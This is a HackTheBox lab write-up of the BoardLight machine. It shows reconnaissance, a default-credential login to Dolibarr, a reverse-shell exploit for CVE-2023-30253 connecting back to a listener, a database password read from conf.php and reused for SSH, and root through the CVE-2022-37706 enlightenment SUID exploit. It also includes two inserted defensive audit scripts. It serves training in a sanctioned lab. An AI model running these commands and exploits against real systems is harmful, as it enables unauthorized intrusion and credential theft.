HackTheBox-Machines BoardLight Writeup

kazma, founder and president of the NCKU Cybersecurity Club (成大資安社)

Exploitation

As usual, start with a basic scan:

└──╼ [★]$ nmap -sV 10.10.11.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 06:53 CDT
Nmap scan report for 10.10.11.11
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds

It looks like there is a web service and SSH. whatweb shows what the web service is running:

└──╼ [★]$ whatweb 10.10.11.11
http://10.10.11.11 [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]

While we are at it, add the host to /etc/hosts:

└──╼ [★]$ echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
10.10.11.11 board.htb

Next, fuzz for subdomains:

└──╼ [★]$ ffuf -u http://board.htb -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host:FUZZ.board.htb" -fw 6243 
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6243
________________________________________________

crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 380ms]

There is a crm subdomain, so we add it to /etc/hosts as well:

└──╼ [★]$ echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
10.10.11.11 crm.board.htb

Opening crm.board.htb in a browser shows a login page:
(screenshot: Dolibarr login page)
The page title says Dolibarr; a quick search explains what that is:

Dolibarr ERP CRM is an open source, free software package for companies of any size, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.

In short, it is an open-source ERP + CRM for businesses.
At the same time, search for its default password:

Login/password of Dolibarr ERP & CRM: - If you did not change it, login is admin and password is the same as the one sent by email for your dashboard access, once your instance was created. Take a look into your message box to retrieve it. EMail topic should start with "Welcome to Dolicloud".

And indeed, the default password lets us straight in.
Also check whether Dolibarr 17.0.0 has any known vulnerabilities; of course it does:
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

└──╼ [★]$ python exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
hostname Target hostname
username Username of Dolibarr ERP/CRM
password Password of Dolibarr ERP/CRM
lhost Listening host for reverse shell
lport Listening port for reverse shell

options:
-h, --help show this help message and exit
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-jejtlehtvs]─[~/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.22 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

Reverse shell:

└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.11] 44222
bash: cannot set terminal process group (893): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

After getting the shell, we first switch to bash as usual, then search online for where Dolibarr keeps its configuration file:
(screenshot: search result showing the location of Dolibarr's configuration file)
Nice. Let's look for conf/conf.php, which should contain db_pass:

www-data@boardlight:/$ find /var -name "conf.php" 2>/dev/null
find /var -name "conf.php" 2>/dev/null
/var/www/html/crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:/$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php | grep db_pass
<l/crm.board.htb/htdocs/conf/conf.php | grep db_pass
$dolibarr_main_db_pass='serverfun2$2023!!';

That gives us the user's password, so we try switching to that user:

www-data@boardlight:/$ su larissa
su larissa
Password: serverfun2$2023!!

larissa@boardlight:/$ cd ~
cd ~
larissa@boardlight:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
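
The foothold above turned into a user account because conf.php was readable from the www-data shell and the database password doubled as larissa's login. As an added example (not from the original writeup, and not Dolibarr's own tooling), here is a small POSIX sh audit that reports whether a conf.php is readable by other local accounts and which password-bearing settings it holds, without ever printing the values. The script path, the argument handling and the sample file built in the comments are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not part of the original writeup or of Dolibarr).
# Audits a Dolibarr conf.php after the step above: can other local accounts
# read the file, and which settings in it carry a password? Secret values
# are never printed, only the setting names.

# check_conf_perms FILE
#   returns 0 when the "other" read bit is clear (owner/group only),
#           1 when any local account can read FILE,
#           2 when FILE does not exist.
check_conf_perms() {
    f=$1
    [ -f "$f" ] || { echo "missing: $f"; return 2; }
    # POSIX find: -perm -004 matches only when the other-read bit is set.
    if [ -n "$(find "$f" -perm -004 -print)" ]; then
        echo "WORLD-READABLE: $f"
        return 1
    fi
    echo "ok (not readable by others): $f"
    return 0
}

# list_secret_settings FILE
#   prints the names of settings such as $dolibarr_main_db_pass='...';
#   (any setting whose name ends in _pass), one per line, values omitted.
list_secret_settings() {
    sed -n 's/^\$\([a-z_]*_pass\)=.*/\1/p' "$1"
}

# audit_dolibarr_conf FILE
#   runs both checks; the exit status is that of check_conf_perms.
audit_dolibarr_conf() {
    [ -f "$1" ] || { echo "missing: $1"; return 2; }
    names=$(list_secret_settings "$1")
    [ -n "$names" ] && printf 'secret settings in %s: %s\n' "$1" "$names"
    check_conf_perms "$1"
}

# Stand-alone use (hypothetical script name):
#   sh dolibarr_conf_audit.sh /var/www/html/crm.board.htb/htdocs/conf/conf.php
if [ $# -eq 1 ]; then
    audit_dolibarr_conf "$1"
fi
```

A non-zero exit is the signal to act on: tighten the mode so only the web server's owner and group can read the file, and make sure the database password is not reused for any shell account, which is what made the su step above possible.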

Logged in successfully! So we log in as larissa directly over SSH, and while we are at it we check the SUID binaries, which shows that enlightenment has SUID set:

└──╼ [★]$ ssh [email protected]
The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.
[email protected]'s password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

larissa@boardlight:~$ find / -perm /u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

Next we can search online for a matching exploit:
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

larissa@boardlight:~$ vi exploit.sh
larissa@boardlight:~$ chmod +x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# find / -name "root.txt"
/root/root.txt

We paste the exploit in with vi, make it executable, and running it gives a one-shot privilege escalation to root!
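
The root step hinged on a setuid-root binary that nobody on the host was expecting. As an added example (not from the original writeup or from the enlightenment project), here is a POSIX sh audit that lists the setuid files under a root directory and compares them against an allowlist, so that an unexpected one such as enlightenment_sys is flagged by the owner rather than found by an intruder. The script name, the allowlist path and the sample tree in the usage note are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup or from the enlightenment
# project). Compares the setuid binaries present on a host against an
# allowlist, so that an unexpected one such as enlightenment_sys above is
# flagged by the owner before anyone else enumerates it.

# find_suid ROOT
#   lists regular files under ROOT with the setuid bit set, sorted.
find_suid() {
    # POSIX find: -perm -4000 matches when the setuid bit is set.
    # Unreadable directories are skipped, as in the enumeration above.
    find "$1" -type f -perm -4000 -print 2>/dev/null | sort
}

# audit_suid ROOT ALLOWLIST
#   ALLOWLIST holds one expected setuid path per line (take it from a
#   freshly installed host, or generate it with find_suid on a known-good
#   system). Prints every setuid file under ROOT that is not listed.
#   Returns 0 when nothing unexpected was found, 1 otherwise, 2 on a
#   missing allowlist.
audit_suid() {
    root=$1
    allow=$2
    [ -f "$allow" ] || { echo "allowlist not found: $allow" >&2; return 2; }
    # -x: whole-line match, -F: fixed strings, -v: keep the unlisted ones.
    unexpected=$(find_suid "$root" | grep -vxFf "$allow")
    if [ -n "$unexpected" ]; then
        printf '%s\n' "$unexpected" | while IFS= read -r p; do
            echo "UNEXPECTED setuid file: $p"
        done
        return 1
    fi
    echo "ok: no setuid files outside the allowlist under $root"
    return 0
}

# Stand-alone use (hypothetical script and allowlist names):
#   sh suid_audit.sh / /etc/suid-allowlist.txt
if [ $# -eq 2 ]; then
    audit_suid "$1" "$2"
fi
```

Run it from cron or a configuration-management check; a new entry is either a package you installed knowingly (add it to the allowlist) or something to remove the setuid bit from and investigate.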

Pwned !!!

(screenshot: HackTheBox "Pwned" badge)

  • Title: HackTheBox-Machines BoardLight Writeup
  • Author: kazma
  • Created at : 2024-08-11 11:36:19
  • Updated at : 2024-08-11 20:49:29
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Machines-BoardLight-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.